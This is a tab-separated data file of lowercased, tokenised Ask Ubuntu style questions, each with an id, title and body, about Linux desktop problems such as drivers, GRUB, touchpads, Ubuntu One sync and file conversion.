58546	how to easily rename files using command line ?	one of the ways i quickly rename files in windows is f2 > rename > tab ( to next file ) > rename ... but in ubuntu/nautilus , i ca n't tab to next file . but being on linux , i think there must be a command line alternative . however , sometimes , i may want more control over how to rename specific files . in that case , perhaps its better to be able to tab to the next file
58547	can anybody help me to make kworld ub445-q tv tuner work ?	can anybody help me to make kworld ub445-q tv tuner work in ubuntu ? product page : http : //us.kworld-global.com/main/prod_in.aspx ? mnuid=1306 & modid=10 & pcid=71 & ifid=17 & prodid=848 lsusb output : bus 002 device 051 : id 1b80 : e421 afatech
58552	blank after selecting 'install ubuntu '	hardware , new mac running some radeon derivative . looked at a few tutorials which ask me to press f6 and set 'nomodeset ' but these all seem to be after installing ubuntu . where as i ca n't even get into the installer without the screen going black/blank . tried the alternate cd to no avail . any thoughts would be much appreciated . edit : i have tried thus far editing grub with arguments nomodeset xforcevesa installing with pendrive and cdrom hitting f6 at startup provides no changes to the interface as per a guide i was following
58553	turning off the transition animation when changing workspaces in gnome2	by default , the transition from one virtual desktop to another one under gnome2 in ubuntu 11.04 is visualized with a sliding animation . how can i turn that animation off ?
58556	can i change which user is automatically logged in based on the time ?	i have a personal and work account on my machine . i 'd like the automatic login to use the following logic ( if you 'll pardon my python ) ... is this possible ? if ( time < 5pm ) and ( day in workdays ) : log in to work account else : log in to personal account
58560	problem installing google earth .deb file	i have been trying to install google earth on my netbook running 11.04 . i have the .deb file in my directory /home/andy/ but when i use terminal with the command sudo dpkg -i /home/andy/googleearth_6.0.3.2197+0.6.0-1_i386.deb , i get the following error : dpkg : error processing /home/andy/googleearth_6.0.3.2197+0.6.0-1_i386.deb ( -- install ) : can not access archive : no such file or directory is this a typo on my part or is the sudo command accurate and it could be another issue ? also when i double-click this file , it automatically open the software centre application which is then frozen and i have to close it . can a .deb be installed any other way ?
58563	how to set firefox as a default kde-help-browser ?	i 'd like to do it , because of the firefox extended-selection feature ( acutally it is a xulrunner feature - which is a firefox engine ) . another solution would be to find out where all the kde help handbooks are located . do you happen to know that ? edit : knowing where they are wo n't help - since them are in a docbook format - not in html .
58570	failed to boot grub when adding a windows partition on xp	first , i installed xp working . second , i installed ubuntu 10.10 64 bits working , and i have some disk space unused . third , i boot into xp and use xp 's tool to add one partition d. but when i reboot , the grub failed to boot . it shows grub rescue > ubuntu @ ubuntu : ~ $ sudo fdisk /dev/sda warning : dos-compatible mode is deprecated . it 's strongly recommended to switch off the mode ( command 'c ' ) and change display units to sectors ( command 'u ' ) . command ( m for help ) : p disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbfebbfeb device boot start end blocks id system /dev/sda1 * 1 38245 307202931 7 hpfs/ntfs /dev/sda2 38246 63290 201171969 5 extended /dev/sda3 63290 77825 116754272+ 7 hpfs/ntfs /dev/sda5 38246 38975 5859328 82 linux swap / solaris command ( m for help ) : how to fixed it ? i have tried to boot from ubuntu disk to run update-grub , but i failed to run the following mount : ubuntu @ ubuntu : /mnt $ sudo mkdir /mnt/disk ubuntu @ ubuntu : /mnt $ sudo mount -t ext4 /dev/sda2 /mnt/disk mount : wrong fs type , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ubuntu @ ubuntu : /mnt $ ps : 1./dev/sda2 is my ubuntu ext4 partition 2.i can mount ntfs partition ( sda1 , sda3 ) without -t parameter , but only mount ext4 failed . what can i do next ? thank you~
58572	is there a program where i can embed other programs ' windows ?	i 'm a developer and am often working on multiple different projects . it would help me a lot to have a software where i can create a profile for each project . if i start a profile it should open other programs i configured before and display them inside a single window . it should be possible to arrange them in tabs or also on a screen , one on the left and one on the right or similar . i think mainly about browsers , pdf-viewers and terminals . this will give me access to the bug-tracker in a browser , log output in a console , specifications in a pdf and so on . it would make switching between projects much easier . is there anything or does anyone have a hint how it could be implemented with a scripting language ?
58573	third mouse button as paste in chromium	has anyone succeeded in getting chromium to use the third mouse button as paste ? at least on the select to copy side i am aware of this extension but unaware of anyone who figured out how to have unix-style paste .
58575	add lines to cron from script	is there a way to add lines to a user 's cron via script ? i usually do it using crontab -e , but i would like to automate this task with a shell script .
58581	vlc hd bad playback	i 'm getting unsmooth and unsynced vertical playback placback with vlc . my hardware is certainly capable of running 1080p . it 's watchable but not as good as on windows with media player classic and the k-lite codec pack . so why is this happening ?
58583	dovecot does not receive emails - connection refused	i try install mail server on ubuntu , i 've installed dovecot server . telnet localhost 110 - correct telnet mail.domain.cz 110 - correct when i send email : echo `` testicek '' | mail -s `` dovecot test '' info @ domain.cz and connect to the box info @ domain.cz , i found it , so it 's correct . but when i send email from outside ( forexample gmail ) , to info @ domain.cz is returned : the recipient server did not accept our requests to connect . learn more at http : //mail.google.com/support/bin/answer.py ? answer=7720 [ domain.cz ( 1 ) : connection refused ] in log is n't something error , so i do n't know where i can find problem , but i think so , it can be in setting of domain : 1800 a 31.31.73 . *** * 1800 a 31.31.73 . *** subdomains , etc . is correcly on apache ( lamp ) and send email via squirrelmail is correct too . thanks for help !
58584	can i automatically deactivate my touchpad when a usb-mouse is connected ?	i know that i can check if the touchpad is active with gconftool-2 -- get /desktop/gnome/peripherals/touchpad/touchpad_enabled and i can set it disabled / enabled with gconftool-2 -- set -- type boolean /desktop/gnome/peripherals/touchpad/touchpad_enabled true with lsusb i can see all connected usb-devices . which is for my mouse : bus 003 device 002 : id 046d : c00e logitech , inc. m-bj58/m-bj69 optical wheel mouse more information with lsusb -v : bus 005 device 002 : id 046d : c00e logitech , inc. m-bj58/m-bj69 optical wheel mouse device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x046d logitech , inc. idproduct 0xc00e m-bj58/m-bj69 optical wheel mouse bcddevice 11.10 imanufacturer 1 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 34 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 98ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 1 boot interface subclass binterfaceprotocol 2 mouse iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 52 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 10 and here is the information from tail -n 10 -f /var/log/messages : aug 27 08:36:47 pc08 kernel : [ 1795.936583 ] usb 5-2 : usb disconnect , address 3 aug 27 08:36:55 pc08 kernel : [ 1804.208042 ] usb 5-2 : new low speed usb device using uhci_hcd and address 4 aug 27 08:36:56 pc08 kernel : [ 1804.384272 ] usb 5-2 : configuration # 1 chosen from 1 choice aug 27 08:36:56 pc08 kernel : [ 1804.400743 ] input : logitech usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:1d.0/usb5/5-2/5-2:1.0/input/input13 aug 27 08:36:56 pc08 kernel : [ 1804.400923 ] generic-usb 0003:046d : c00e.0004 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb-ps/2 optical mouse ] on usb-0000:00:1d.0-2/input0 and even more information : $ udevadm info -- query=all -- name=/dev/input/mouse1 p : /devices/pci0000:00/0000:00:1d.0/usb5/5-2/5-2:1.0/input/input15/mouse1 n : input/mouse1 s : char/13:33 s : input/by-id/usb-logitech_usb-ps_2_optical_mouse-mouse s : input/by-path/pci-0000:00:1d.0-usb-0:2:1.0-mouse e : udev_log=3 e : devpath=/devices/pci0000:00/0000:00:1d.0/usb5/5-2/5-2:1.0/input/input15/mouse1 e : major=13 e : minor=33 e : devname=/dev/input/mouse1 e : subsystem=input e : id_input=1 e : id_input_mouse=1 e : id_vendor=logitech e : id_vendor_enc=logitech e : id_vendor_id=046d e : id_model=usb-ps_2_optical_mouse e : id_model_enc=usb-ps\x2f2\x20optical\x20mouse e : id_model_id=c00e e : id_revision=1110 e : id_serial=logitech_usb-ps_2_optical_mouse e : id_type=hid e : id_bus=usb e : id_usb_interfaces=:030102 : e : id_usb_interface_num=00 e : id_usb_driver=usbhid e : id_path=pci-0000:00:1d.0-usb-0:2:1.0 e : devlinks=/dev/char/13:33 /dev/input/by-id/usb-logitech_usb-ps_2_optical_mouse-mouse /dev/input/by-path/pci-0000:00:1d.0-usb-0:2:1.0-mouse how can i use this to automatically deactivate my touchpad when a usb-mouse is connected and activate it again as soon as the usb-mouse disappears ?
58589	how to install ppstream ?	i googled and found many posts that says to add a repository to install ppstream . but i have n't get a success . so how do i install ppstream on ubuntu 10.10 ?
58590	crashing as a result of turning off the wireless lan interface on a dell e6410 ?	lately ( this past few days after an update ) my laptop started acting strange . the meaning by acting strange is that : ubuntu just crashes whenever i fiddle with the wlan . the internet has become ridiculously slow . using speedtest.net points out that when i 'm using ubuntu the download speed graph is very `` edgy '' , the upload seems to be fine . on windows though the download speed is just fine ( around 50mbps , the ubuntu test did n't get past the 1mbps ) . i think it started after the latest kernel update ( to 2.3.68.11 if i remember correctly ) . tried to update it again but it went even worse than it was before . edit : i 've done a speedtest on a live cd with ubuntu 11.04 ( same as i have installed ) and it works great , the installed version is corrupted i guess . how can i fix it ? my system is as follows : dual boot : windows 7 64bit , ubuntu 11.04 32bit laptop : dell e6410 , i7 4 gb ram wireless network card : dw1520 wireless-n half-mini card
58591	how do i enable s3 state ?	i 'd like to save my computer state in ram and not on the hdd . how can i obtain this in 11.04 ?
58593	how do i enable video decoding on gpu ( ati ) and xbmc ?	i just built an htpc / homeserver , i used ubuntu 10.04 lucid lynx and combined it with xbmc . the hardware i 'm using is asus e35m pro ( embedded low voltage cpu and hd6310 gpu ) . however if i run 1080p video footage , everything starts to stutter . i checked with htop from an ssh connection and noticed one of the cores goes into 100 % load . i was wondering why it does not use the gpu instead ? ( i have installed proprietary drivers from ati ) . do i have to change settings ? is it xbmc related , ubuntu related or does ati just not support hardware video decoding on their gpu on linux ?
58594	how to acheive media streaming from my local machine to the internet ?	how to make ubuntu 11.04 `` desktop version '' a streaming audio/video box ; catering atleast 1k users at the same time . are there any software to achieve it . i did using vlc player for streaming with lan environment . how can i do streaming the same from my localmachine to internet .
58599	accidently activated keyboard input methods	i accidentally activated keyboard input methods and now my keyboard does not respond . i do n't know what to do . i 'm being forced to use my android to look it up . i 'm using ubuntu 11.04 .
58601	fsck gets mad when the file system is mounted	when i run fsck -fy in a terminal it says something similar to : warning ! ! file system mounted ! ! you will cause seviere damages . why is that ? this might be a little off-topic but i ran that command under mac os x and it did n't complain about anything , nothing bad happened . i have the familiar setup , mac g4 800mhz 832mb ram lubuntu 11.04
58602	are there any lightweight xmpp server ?	are there any lightweight xmpp server that works well on ubuntu desktop 11.04 ; i basically wanted to learn , test and develop some small application that uses xmpp features .
58612	how do i pre-populate a squid proxy with a ubuntu installation ?	i have an installation service in a central data centre and proxies in other data centres and need to pre-populate those proxies with the contents of the installation . what 's the best way to do this ? i 've been thinking of writing a script along the lines of : debootstrap - with -- include option to include all additional packages above and beyond the minimal setup , run this once inside each dc to populate the proxy . apt-proxy-import - apt-proxy can add debs directly into the cache , take them from an existing installs /var/cache/apt/archives dir . take the cache miss and have a slow first install ?
58619	how to make gnome always run a script , not ask if it should be displayed ?	i have written a script : for file in *.svg do inkscape -- file= $ file -- export-area-page -- without-gui -- export-pdf= $ { file % . * } .pdf done which converts all svg files in a directory to pdf . whenever i run it from nautilus ( after making it executable ) , the latter asks me if i want the script to be run or displayed . i always want it run , not displayed . can i achieve this ?
58623	how do i fix a blurry screen problem ?	i 'm using ubuntu 11.04 on my laptop samsung qx410 . i also have philips 221el display . i want to use this display as the main one ( instead of the laptop 's one ) . but when i use it , the screen looks blurred . i thought that was a graphics driver-related problem , i spent much time trying to install the proper graphics driver . finally i managed to do this ( at least 3d effects work ) , but the display is still blurry . it is blurry while using any resolution - i tried a lot of them , including recommended 1920 x 1080 and refresh rate 60hz . at the same time , laptop 's display always looks ok. and the philips monitor looks okay when using windows , so it 's an ubuntu-specific problem .
58625	where is the shutdown log ?	i am trying to debug a hang during shutdown and i do n't find where the messages that i see during shutdown are being stored . they are n't in /var/log/syslog
58626	csv splitter for ubuntu ?	is there an application or a command that could to split a csv ( preserving the a table header ) into smaller equal parts ? i 'm trying to import a large 36mb file and the importer is going kaputz . here 's an example of a windows application : http : //download.fyxm.net/csv-splitter-33994.html i guess i could use wine to use this program but would prefer something native of ubuntu .
58627	resume from suspend occasionally causes a restart	occasionally my pc wont resume from suspend ( to ram ) properly . instead of the expected `` resume '' the pc just does a normal boot . my biggest problem is that i have no clue where to look for that error . i am missing a point to start , especially because it happens not very often and i ca n't reproduce it . i 'm running on 64 bit natty . my pc : amd phenom ii x4 955be gigabyte ga-770ta-ud3 ati radeon hd 5770
58629	gnome 's alt+f2 sometimes freezes while loading icon or completion	i use alt+f2 a lot in gnome 2 . but when i enter , say , fir it sometimes freezes for up to ten seconds in order to complete it to firefox . sometimes , it completes , even got the icon loaded , but does not let me click on run . after a few seconds it just launches the program since i already clicked the button . is there any way to un-freeze this ?
58635	gui ftp server recommendation	every time i try to setup an ftp server with user account , i get into troubles . is there some ftp server with gui that i can set it up easily ? is there any good and working tutorial for setting up an ftp server ?
58641	after installing nautilus-open-terminal , my desktop looks ugly	i installed nautilus-open-terminal package to ubuntu 11.04 ( installed in virtual box ) , and my ubuntu desktop looks old . please look at : how can i change it back ?
58642	ubuntu one account not working	yesterday i wanted to try out the ubuntu one storage feature and logged in . i could n't sync anything from either windows or ubuntu . in windows nothing really happens . in ubuntu i get a file sync error . ( auth failed ( auth_failed ) ) error . if i log onto the website it gives me a `` something has gone wrong '' error . if i go to my account page it says i 'm not subscribed to the file storage and if i click on the sign up button it goes to the `` something has gone ... . '' page . i tried deleting every device via the homepage . changing my password did n't work . my girlfriend created an account and it works perfectly on her machine and mine . does anyone have an idea on how to solve this ?
58648	will there be an appearance app in 11.10 , or another standard way to change themes ?	i 've been testing out 11.10 and so far the only way i can change the theme is by installing gnome tweak tool . will there be a standard ( i.e . installed by default ) way to change themes and other appearance options ? just curious .
58651	will thunderbird integrate with the calendar indicator ?	since we 're past feature freeze does that mean that there will be no more efforts into integration of thunderbird and unity ?
58654	bug in nautilus windows with many subfolders	i found a bug . when i open folder in nautilus with many sub-folders , so that a vertical scrollbar appears . i type a name of same file , so that file becomes selected and then move down to the end of the scrollbar . after it nautilus become down . how do i fix this ? or how do i report it to developers ?
58657	how do i set a vlc instance to run as a live wallpaper	i 've seen an article describing how to use vlc as a live wallpaper for the desktop , however the options mentioned there only refer to windows . what would i need to do to achieve the same result ?
58659	where can i find the source for libtracker-miner ?	i 've compiled tracker from sources as described here . but when running 'tracker-control ' it says something about not being able to load libtracker-miner-0.12.so.0 ( see error message below ) . where can i get this library ? ( i am not interested in using the pre-packaged .debs as i want to use it for development . ) tracker-control : error while loading shared libraries : libtracker-miner-0.12.so.0 : can not open shared object file : no such file or directory
58661	how to stop flash from filling up my /tmp partition	my system was originally set up as a server machine , so i made separate partitions for /tmp , /var , /usr , etc . but now i 'm using it as a desktop machine , and what i 've noticed while watching streaming video from the usa pro cycling challenge is that as i watch , the /tmp partition gets fuller and fuller until it hits 100 % and the video locks up . is there any way i can make flash use /var/tmp instead of /tmp ? does it respect the tmpdir environment variable if i pass that to firefox ? this is ubuntu 11.04 and firefox 6 and flash 10,3,183,5 .
58662	are there any ubuntu-compatible laptops with a 1600x900 screen that are 1.1 '' thick or less ?	i 'm looking for a laptop for work , and i will be running ubuntu as primary os ( close to 100 % of the time ) . the toshiba tecra r840 caught my eye with its higher resolution display ( 1600x900 ) . i can not find any information on linux compatibility however . i am looking at ordering with integrated intel hd 3000 graphics only , no switchable graphics or anything . any thoughts ? if there are laptops with similar specs ( high res display , < 1 '' thick , light , sandy bridge core i5/i7 ) that are known to be ubuntu compatible , please point me to them .
58664	ca n't install package libglib2.0-dev because it depends on some unknown version	i have 10.04.2 lts and i want to install libglib2.0-dev . so i do : $ sudo apt-get update & & sudo apt-get upgrade $ sudo apt-get install libglib2.0-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libglib2.0-dev : depends : libglib2.0-0 ( = 2.24.0-0ubuntu4 ) but 2.24.1-0ubuntu1 is to be installed e : broken packages i do n't understand from where the 2.24.1-0ubuntu1 version came out . the package details are : $ apt-cache showpkg libglib2.0-dev package : libglib2.0-dev versions : 2.24.0-0ubuntu4 ( /var/lib/apt/lists/ru.archive.ubuntu.com_ubuntu_dists_lucid_main_binary-i386_packages ) description language : file : /var/lib/apt/lists/ru.archive.ubuntu.com_ubuntu_dists_lucid_main_binary-i386_packages md5 : f1a310bc28a3b8566d2f79a4116e8a0e how can i fix it and install libglib2.0-dev ?
58673	not connecting to internet	so i recently installed ubuntu on my laptop , and well it 's not detecting any wireless connections , and what 's even worse is that it wo n't connect to the internet via ethernet cable . when i plug in the cable it says it 's connected , but when i try using the internet it does n't work . it says i 'm connected though . i have a hp g7-1150us .
58674	is there a setting or tool that will make my mouse not shake when my finger is on my touchpad ?	on my toshiba laptop , when i touch my touchpad but do n't move my finger , my mouse shakes slightly . the mouse sensitivity settings in the control panel do n't help . does this happen to anyone else ? is there a fix ? it does n't happen in windows . it 's really annoying and makes doing anything that requires any precision annoying ( e.g . selecting a substring in a word ) . on top of that , my habit of selecting text as i read it makes using the internet near impossible . help ! i installed ubuntu to have a better dev environment , but this is making me want to switch back or move to a mac ( using rails ) . it happens in both gnome 2 w unity and 3 ( still on 2 though . took me about 5 minutes to decide to switch back ) . should i try kde ? edit : xinput set-prop < id > `` synaptics jumpy cursor threshold '' < val > does n't seem to be doing anything ...
58675	how can i download different applications itunes , etc . ?	this is what it says everytime i try to download something archive : /home/user/desktop/untitled folder/itunes64setup.exe [ /home/user/desktop/untitled folder/itunes64setup.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/user/desktop/untitled folder/itunes64setup.exe or /home/user/desktop/untitled folder/itunes64setup.exe.zip , and can not find /home/user/desktop/untitled folder/itunes64setup.exe.zip , period .
58676	copy only certain bytes of file ?	how can i copy a file , starting at $ n bytes and onward ? i can use curl 's -r option like this : $ curl -r 41663- http : //server.com/file.ext to download from byte 41663 and onward , but how can i do this with a local file ? i could use split , and make each file the size of the offset i want , but that would just complicate thigns . is there a simple way to do this ?
58679	use gconftool-2 for other users settings	if i run gconftool-2 it works with my own profile . but i 'd like to tweak the other users . is it possible to use it for other users profiles ? should i `` su `` and only then run gconftool-2 ? may there is another way ?
58680	computer wo n't connect to internet using ethernet cable	i 'm new to ubuntu linux . i have a sony vaio computer and am trying to get it connected to the internet using an ethernet cable . i 'm able to connect a windows machine to the internet using this cable , but am not able to figure out how to get my ubuntu linux computer to connect . there is something wrong with how my computer is configured . please help ! i use 10.04 .
58681	foss ipv6 capable sip client	i would like to try sip . however , i am having troubles with ekiga and upon looking them up it sounds like it is a nat problem . since i have control of both clients , i figured ipv6 would be much easier because i would n't have to worry about nat . however , it sounds like ekiga does n't support ipv6 . is there a sip client that supports ipv6 and is foss that runs on ubuntu ?
58683	how do i restore the old look of ubuntu 10.10 ?	where i can restore the old look of ubuntu 10 , or get back the `` start '' panel ? the new left sidebar is beauiful , but kinda hard to get quick access to applications cause i need to search every time the app name
58687	can i safely remove all the files in /tmp ?	i want to make free space on my computer , and baobab tells me /tmp is 8 gio large . can i delete all the files in /tmp safely ? do i have to close some programs first ? additionally , why is this directory so big ? though my /etc/defautl/rcs indicates tmptime=0 ?
58691	ubuntu one : constant `` file sync is disconnected '' error	i 'm looking to upload a file to my ubuntu one cloud , but when i open the ubuntu one control panel on my ubuntu 11.04 natty narwhal machine , it notifies me that `` file sync is disconnected . '' so , naturally , i 'll click the `` connect '' button next to it , and it will say `` file sync in progress ... '' and it will want to upload my file , but it does n't seem like anything is happening . then , after a minute , it will simply regress into `` file sync is disconnected . '' this , of course , frustrates me greatly , and causes me to wonder , is the ubuntu one cloud server simply down ? or , if not , then what could i possibly be doing wrong ?
58692	ubuntu one file sync problem - ssl handshake error	ubuntu one file sync is n't working for me for 11.04 . it is continuously attempting to sync a small file with no luck . from syncdaemon.log : 2011-08-25 21:51:14,263 - ubuntuone.syncdaemon.main - note - local rescan finished ! 2011-08-25 21:51:14,263 - ubuntuone.syncdaemon.main - info - hash queue empty . we are ready ! 2011-08-25 21:51:14,288 - ubuntuone.syncdaemon.actionqueue - info - connection started to host fs-1.ubuntuone.com , port 443 . 2011-08-25 21:51:14,473 - ubuntuone.syncdaemon.actionqueue - info - connection made . 2011-08-25 21:51:14,474 - ubuntuone.syncdaemon.storageclient - info - connection made . 2011-08-25 21:51:35,639 - ubuntuone.syncdaemon.storageclient - info - connection lost , reason : [ failure instance : traceback ( failure with no frames ) : < class 'openssl.ssl.error ' > : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] ] . 2011-08-25 21:51:35,639 - ubuntuone.syncdaemon.actionqueue - warning - client mismatch while processing the request 'protocol_version ' , client ( < ubuntuone.syncdaemon.action_queue.actionqueueprotocol instance at 0x29308c0 > ) is not self.client ( none ) . 2011-08-25 21:51:35,640 - ubuntuone.syncdaemon.actionqueue - warning - connection lost : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] 2011-08-25 21:51:47,442 - ubuntuone.syncdaemon.dbus - info - connect was requested . are we autoconnecting ? false . 2011-08-25 21:51:48,177 - ubuntuone.syncdaemon.dbus - info - 'credentialsfound ' : callbacking with credentials . 2011-08-25 21:51:48,178 - ubuntuone.syncdaemon.dbus - info - connect : credential request was successful , pushing sys_user_connect . 2011-08-25 21:51:48,200 - ubuntuone.syncdaemon.actionqueue - info - connection started to host fs-1.ubuntuone.com , port 443 . 2011-08-25 21:51:48,382 - ubuntuone.syncdaemon.actionqueue - info - connection made . 2011-08-25 21:51:48,382 - ubuntuone.syncdaemon.storageclient - info - connection made . 2011-08-25 21:52:09,547 - ubuntuone.syncdaemon.storageclient - info - connection lost , reason : [ failure instance : traceback ( failure with no frames ) : < class 'openssl.ssl.error ' > : [ ( 'ssl routines ' , 'ssl3_read_bytes ' , 'ssl handshake failure ' ) ] ] . 2011-08-25 21:52:09,730 - ubuntuone.syncdaemon.hq - info - hashqueue : _hasher stopped 2011-08-25 21:52:09,730 - ubuntuone.syncdaemon.tritcask - info - shutting down ... 2011-08-25 21:52:09,740 - ubuntuone.syncdaemon.dbus - info - shuttingdown dbusinterface ! 2011-08-25 21:52:09,747 - ubuntuone.syncdaemon.actionqueue - info - the request 'protocol_version ' failed with the error : [ ( 'ssl routines ' , 'ssl3_read_bytes ' , 'ssl handshake failure ' ) ] and was handled with the event : sys_unknown_error 2011-08-25 21:52:09,748 - ubuntuone.syncdaemon.actionqueue - warning - connection lost : [ ( 'ssl routines ' , 'ssl3_read_bytes ' , 'ssl handshake failure ' ) ]
58693	how to stop umount all when i exit ssh session ?	so when i 'm logged into lucid via ssh , and type exit to end the session , umount -a is run first by the system . i see the follow message before it logs me out : umount : /home : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) < p > umount : /var/run : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) < p > umount : /dev/shm : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) < p > umount : /dev : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) < p > umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) < p > how can i stop this ?
58701	canon lbp and hp laserjet 1020 say `` document printed '' but nothing prints	my printer is being recognized , installed . when i am trying to print anything it 's saying '' document printed '' and '' documnt has been sent for printing '' but nothing is actually printed . i 've tried canon lbp printers and hp laserjet 1020
58704	how do i get an atheros ar9285 working ?	i 've just decided to jump into the world of ubuntu , so far i encountered no problems until i tried to connect to my wireless network . i 'm running ubuntu on my laptop , acer aspire 5333-2880 , which has an acer nplify 802.11b/g/n wireless card . after browsing for an answer , i think the problem is a missing driver . input : lspci | grep network output : 02:00.0 network controller ; atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) i found a couple of answers that might be right , but i have problems with both of them . https : //help.ubuntu.com/community/wifidocs/device/atheros/ar9285 it requires me to load the site in my laptop , but i ca n't do it without internet and i have no idea how to save this into a usb . http : //linuxwireless.org/en/users/download/stable/ but i have no idea how to really run or use this , and i would n't like to screw it up . any advice or other possible solutions will be greatly appreciated ! edit . thanks a lot for your input marko and jorge . i am sure the problem was with one of the drivers , but i was too distracted , or tired yesterday to realize i did n't restart my computer after installing . as soon as i got turned on my computer again , it was working . annoyingly , i am not sure what the problem was exactly nor what exactly fixed it . but still , thanks a lot marko for the intel on how to build packages , i am sure it will be very useful later on !
58715	how can i convert a folder of .pngs to .jpgs while setting the background color ?	i have a folder of png files that have transparent backgrounds . i would like to convert them from the command line and maintain the images ' transparent backgrounds . i 'd appreciate any help . since jpgs do n't support transparency so how can i specify the output jpg 's background color 's hex value ? right now it defaults to # ffffff ? i have tried this script , but it gives the output jpgs white backgrounds : mogrify -quality 100 -format jpg *.png update i created these png files in inkscape . i should mention that my goal in converting these pngs to jpgs is to get rid of jagged edges on circular or angular objects . the pngs currently have jagged edges and i read that converting them to jpgs might solve this problem . however converting via the method outlined in christian skjă¸dt 's answer gives the images even worse jagged edges . is there a way that i can convert the pngs to jpg and also use anti-aliasing or maybe another technique to get rid of the jagged edges ? thanks for the help .
58722	driver for proper hd-playback using ati firepro m5800	i have a hp 8540w notebook with a ati firepro m5800 graphic card and have tried several drivers : the default one , the proprietary one ( available through the additional driver dialog ) and ati-driver-installer-11-8-x86.x86_64 , but all them seem to have real difficulties playing hd-videos without any stuttering . also , hd-video playback does work well on windows 7 . what driver should i use ? it seems my graphics card is a pretty rare one .
58725	how do we know that a directory is apache writable ?	i 've been told that i should create a images folder and an assets folder , and that i needed to make sure that : `` they are apache writable '' . i 've also been told to make the app/runtime directory web-writable . is this the same as apache writable ? if so : how can i do that at once , or know that ? doing a ls -l i 'm getting something like : drwxr-xr-x 13 user user 4096 2011-08-26 10:23 app drwxr-xr-x 4 user user 4096 2011-08-26 10:23 runtime drwxr-xr-x 2 user user 4096 2011-08-26 11:11 images drwxr-xr-x 2 user user 4096 2011-08-26 11:12 assets
58730	how can i make vim a full fledged ide	how could i make vim a full fledged ide by using different supported plugins for yui , jquery and git integration etc .
58731	how do i make package files install to the correct location ?	i have made a python application and managed to create a package . however , when i install the package , no files seem to be installed . i have created an app.install file in the debian directory which contains : bin/ /usr/bin app.desktop /usr/share/applications the .py file is in debian/bin and the .desktop file is in debian .
58732	how can i move the default home folder directories to a new location ?	i 've got a user and i want to move all the folders that ubuntu created in the user folder such as desktop , documents , downloads etc to different location . how can i do that ? i 'm using lvm : /dev/mapper/server-root 822g 2.4g 777g 1 % / none 1.5g 668k 1.5g 1 % /dev none 1.5g 176k 1.5g 1 % /dev/shm none 1.5g 372k 1.5g 1 % /var/run none 1.5g 0 1.5g 0 % /var/lock /dev/sda1 228m 23m 194m 11 % /boot
58733	what is kworker and signalsender	what is kworker and signalsender and why its utilizing more cpu . the stats from powertop gave these numbers . how can i optimize it . top causes for wakeups : 28.4 % ( 420.4 ) ps/2 keyboard/mouse/touchpad interrupt 14.8 % ( 219.5 ) [ kernel scheduler ] load balancing tick 14.0 % ( 206.8 ) kworker/0:0 8.4 % ( 124.9 ) signalsender 7.7 % ( 114.5 ) [ rescheduling interrupts ] < kernel ipi > kernel : kernel version - linux xyz-xx-xx-110-1100 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:05:14 utc 2011 i686 i686 i386 gnu/linux powertop stats top causes for wakeups : 18.5 % ( 203.6 ) [ kernel scheduler ] load balancing tick 18.5 % ( 203.5 ) kworker/0:0 16.1 % ( 176.6 ) [ rescheduling interrupts ] < kernel ipi > 14.2 % ( 156.2 ) signalsender 9.4 % ( 103.5 ) [ uhci_hcd : usb5 , eth1 , i915 ] < interrupt > 8.6 % ( 94.5 ) d chromium-browse 4.4 % ( 48.8 ) compiz 3.8 % ( 41.5 ) alsa-sink 3.4 % ( 37.7 ) icecast 0.6 % ( 6.1 ) xorg 0.5 % ( 6.0 ) nginx 0.5 % ( 5.1 ) [ function call interrupts ] < kernel ipi > 0.5 % ( 5.0 ) syndaemon 0.4 % ( 4.1 ) [ ahci ] < interrupt > 0.1 % ( 1.0 ) [ hda_intel ] < interrupt > suggestion : enable the config_pm_advanced_debug kernel configuration option . this option will allow powertop to collect runtime power management statistics .
58735	swapping the double and triple finger tap actions on trackpad	i am looking for a way to swap the 'tap ' action when using two and three fingers . at the moment , as standard , double-finger-tapping right clicks , and tripple-finger-tapping middle clicks ... i would like to switch these two actions , while retaining the two-finger scrolling . this makes sense to me because i use middle click a lot , and also middle clicking with two fingers correlates with scrolling with two fingers ( on a traditional mouse , scrolling is done with the middle wheel ) .
